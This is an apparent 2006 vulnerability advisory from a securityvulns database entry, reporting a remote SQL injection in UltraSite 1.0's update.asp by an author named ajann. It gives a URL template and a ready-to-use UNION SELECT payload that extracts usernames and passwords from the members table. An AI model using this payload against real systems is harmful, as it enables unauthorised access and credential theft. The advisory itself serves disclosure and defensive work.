UltraSite 1.0 (update.asp) Remote SQL Injection Vulnerability

2006-11-14T00:00:00
ID SECURITYVULNS:DOC:15032
Type securityvulns
Reporter Securityvulns
Modified 2006-11-14T00:00:00

Description


Title : UltraSite 1.0 (update.asp) Remote SQL Injection Vulnerability

Author : ajann


Admin Panel=>>>

http://[target]/[path]//update.asp?id=[SQL]

Example:

//update.asp?id=-1%20union%20select%200,0,0,username,password,0,0,0,0,0,0,0,0,0%20from%20members%20where%20id%20like%207

"""""""""""""""""""""

ajann,Turkey

...

Im not Hacker!